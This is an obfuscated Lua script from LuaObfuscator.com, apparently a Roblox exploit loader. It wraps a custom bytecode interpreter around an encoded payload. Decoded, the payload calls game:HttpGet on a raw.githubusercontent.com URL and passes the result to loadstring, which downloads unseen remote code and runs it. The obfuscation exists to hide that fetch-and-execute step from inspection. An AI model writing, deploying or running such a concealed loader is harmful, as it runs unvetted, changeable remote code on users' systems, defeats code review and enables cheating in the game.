--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v100=v5(v84,v19);v19=nil;return v100;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(620 -(499 + 56 + 64)))) + (932 -((1221 -364) + 74)))) ;return v85-(v85%1) ;else local v86=0;local v87;while true do if (v86==(568 -(367 + 201))) then v87=((1994 -(68 + 997)) -((1484 -(226 + 1044)) + 713))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + (8 -6) ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==1) then return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * ((1864 -1395) -(1165 -(802 + 150)))) + v38 ;end if (v37==(350 -(64 + 23 + 263))) then v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + (303 -190))) );v18=v18 + 3 + 1 ;v37=2 -1 ;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=998 -(915 + 82) ;v46=(v20(v44,2 -1 ,12 + 8 ) * ((2 -(859 -(814 + 45)))^(1219 -((2633 -1564) + 118)))) + v43 ;v42=4 -2 ;end if (v42==(6 -3)) then if (v47==0) then if (v46==(0 + 0)) then return v48 * (0 -(0 + 0)) ;else local v101=0 + 0 ;while true do if (v101==(791 -(368 + 423))) then v47=3 -2 ;v45=18 -(10 + 8) ;break;end end end elseif (v47==((28745 -20871) -5827)) then return ((v46==(442 -(416 + 26))) and (v48 * ((3 -2)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -1)^((174 + 316) -(145 + 293))))) ;end if (v42==0) then v43=v23();v44=v23();v42=431 -((929 -(261 + 624)) + (685 -299)) ;end if (v42==(1488 -(998 + 488))) then v47=v20(v44,7 + 14 ,26 + 5 );v48=((v20(v44,32)==(773 -(201 + 571))) and  -(1139 -(116 + (2102 -(1020 + 60))))) or 1 ;v42=12 -9 ;end end end local function v25(v49) local v50;if  not v49 then local v88=1423 -(630 + 793) ;while true do if (v88==(0 -0)) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(1 + (1747 -(760 + 987))) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0 -0 ;end)();while true do if (v68==(1 + 0)) then if (v52==3) then for v102= #"|",v23() do local v103=(function() return v21();end)();if (v20(v103, #"]", #"<")~=(836 -(660 + 176))) then else local v105=(function() return 0 + 0 ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105~=(205 -(14 + 188))) then else if (v20(v107, #"xxx", #"gha")== #" ") then v108[ #"http"]=(function() return v59[v108[ #"asd1"]];end)();end v54[v102]=(function() return v108;end)();break;end if (v105==(675 -(534 + 141))) then v106=(function() return v20(v103,2 -0 , #"asd");end)();v107=(function() return v20(v103, #"asd1",3 + 3 );end)();v105=(function() return 1;end)();end if (v105==1) then local v153=(function() return 0 + 0 ;end)();while true do if (0==v153) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 -0)) then local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if (v166==0) then v167=(function() return 0 + 0 ;end)();while true do if (v167==(0 + 0)) then v108[ #"xxx"]=(function() return v22();end)();v108[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v106== #" ") then v108[ #"gha"]=(function() return v23();end)();elseif (v106==(3 -1)) then v108[ #"nil"]=(function() return v23() -((2 -0)^(44 -28)) ;end)();elseif (v106== #"xxx") then local v173=(function() return 0 + 0 ;end)();local v174=(function() return;end)();while true do if (v173~=(1636 -(1373 + 263))) then else v174=(function() return 1000 -(451 + 549) ;end)();while true do if (0==v174) then v108[ #"nil"]=(function() return v23() -(2^(11 + 5)) ;end)();v108[ #"0836"]=(function() return v22();end)();break;end end break;end end end v153=(function() return 1 -0 ;end)();end if (v153==1) then v105=(function() return 2 -0 ;end)();break;end end end if (v105~=(398 -(115 + 281))) then else if (v20(v107, #"[", #"{")== #"{") then v108[2]=(function() return v59[v108[1 + 1 ]];end)();end if (v20(v107,2,2)~= #",") then else v108[ #"nil"]=(function() return v59[v108[ #"91("]];end)();end v105=(function() return 6 -3 ;end)();end end end end for v104= #"~",v23() do v55,v104,v28=(function() return v53(v55,v104,v28);end)();end return v57;end if (v52==(2 + 0)) then local v97=(function() return 0 -0 ;end)();while true do if (v97==0) then v59=(function() return {};end)();for v110= #" ",v58 do local v111=(function() return 1581 -(1535 + 46) ;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if ((0 -0)==v111) then v112=(function() return v21();end)();v113=(function() return nil;end)();v111=(function() return 1;end)();end if (v111~=1) then else if (v112== #"|") then v113=(function() return v21()~=(0 + 0) ;end)();elseif (v112==2) then v113=(function() return v24();end)();elseif (v112~= #"asd") then else v113=(function() return v25();end)();end v59[v110]=(function() return v113;end)();break;end end end v97=(function() return 1;end)();end if (v97~=(868 -(550 + 317))) then else v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 563 -(306 + 254) ;end)();break;end end end break;end if (v68==(0 + 0)) then if (0~=v52) then else local v98=(function() return 0 -0 ;end)();while true do if ((0 -0)==v98) then v53=(function() return function(v114,v115,v116) local v117=(function() return 1467 -(899 + 568) ;end)();local v118=(function() return;end)();while true do if (v117~=0) then else v118=(function() return 0 -0 ;end)();while true do if (v118~=(0 -0)) then else v114[v115-#"!" ]=(function() return v116();end)();return v114,v115,v116;end end break;end end end;end)();v54=(function() return {};end)();v98=(function() return 604 -(268 + 335) ;end)();end if (v98==(291 -(60 + 230))) then v55=(function() return {};end)();v52=(function() return 573 -(426 + 146) ;end)();break;end end end if ((286 -(134 + 151))==v52) then local v99=(function() return 1665 -(970 + 695) ;end)();while true do if (v99~=(0 -0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v99=(function() return 1457 -(282 + 1174) ;end)();end if (v99~=(812 -(569 + 242))) then else v58=(function() return v23();end)();v52=(function() return 5 -3 ;end)();break;end end end v68=(function() return 1 + 0 ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1025 -(706 + 318) ];local v64=v60[1253 -(721 + 530) ];local v65=v60[1274 -(945 + (1176 -(20 + 830))) ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=(2 + 0) -1 ;local v74= -(1 + 0);local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0 + 0 ,v77 do if ((v89>=v71) or (4182==1869)) then v75[v89-v71 ]=v76[v89 + (1501 -(1408 + 92)) ];else v79[v89]=v76[v89 + (1087 -(461 + 625)) ];end end local v80=(v77-v71) + (1289 -(993 + 295)) ;local v81;local v82;while true do local v90=0 + 0 ;while true do if (v90==(1171 -(418 + (879 -(116 + 10))))) then v81=v69[v73];v82=v81[1 + 0 ];v90=1;end if ((1 + 0)==v90) then if ((4630==4630) and (v82<=3)) then if ((2874>=2709) and (v82<=(1 + 0))) then if (v82>(0 + 0)) then v79[v81[(40 + 491) -(406 + 123) ]]();else local v119=v81[1771 -(1749 + 20) ];local v120,v121=v72(v79[v119](v13(v79,v119 + 1 + 0 ,v81[1325 -(1249 + 73) ])));v74=(v121 + v119) -((739 -(542 + 196)) + 0) ;local v122=1145 -(466 + 679) ;for v154=v119,v74 do v122=v122 + (2 -1) ;v79[v154]=v120[v122];end end elseif (v82>((10 -5) -3)) then local v123;local v124,v125;local v126;local v127;v79[v81[2]]=v62[v81[1903 -(106 + 1794) ]];v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[1 + 1 ]]=v62[v81[1 + 2 ]];v73=v73 + (2 -1) ;v81=v69[v73];v127=v81[5 -3 ];v126=v79[v81[117 -(4 + 110) ]];v79[v127 + (585 -(57 + 527)) ]=v126;v79[v127]=v126[v81[(728 + 703) -(41 + 1386) ]];v73=v73 + (104 -(17 + 86)) ;v81=v69[v73];v79[v81[2 + 0 ]]=v81[3];v73=v73 + (1 -0) ;v81=v69[v73];v127=v81[5 -3 ];v124,v125=v72(v79[v127](v13(v79,v127 + ((61 + 106) -((321 -199) + 44)) ,v81[5 -2 ])));v74=(v125 + v127) -(3 -2) ;v123=0;for v157=v127,v74 do v123=v123 + 1 + 0 ;v79[v157]=v124[v123];end v73=v73 + 1 + 0 ;v81=v69[v73];v127=v81[3 -1 ];v79[v127]=v79[v127](v13(v79,v127 + (66 -(30 + 35)) ,v74));v73=v73 + (2 -1) ;v81=v69[v73];v79[v81[2 + 0 ]]();v73=v73 + (1258 -(1043 + 214)) ;v81=v69[v73];do return;end else do return;end end elseif (v82<=((1569 -(1126 + 425)) -13)) then if ((v82==(1216 -((728 -(118 + 287)) + 889))) or (4239<=3546)) then local v141=0;local v142;while true do if ((v141==0) or (3244<=2821)) then v142=v81[5 -3 ];v79[v142]=v79[v142](v13(v79,v142 + (581 -(361 + 219)) ,v74));break;end end else v79[v81[322 -(53 + 267) ]]=v81[(3 -2) + 2 ];end elseif ((343==343) and (v82>(419 -(15 + (1519 -(118 + 1003)))))) then local v145=v81[2];local v146=v79[v81[985 -((52 -34) + (1341 -(142 + 235))) ]];v79[v145 + (3 -(9 -7)) ]=v146;v79[v145]=v146[v81[3 + 1 ]];else v79[v81[2]]=v62[v81[3]];end v73=v73 + 1 + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D61696E536372697074733335322F4D61696E536372697074733335322F6D61696E2F43612O6E6F6E25323042612O6C00083O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
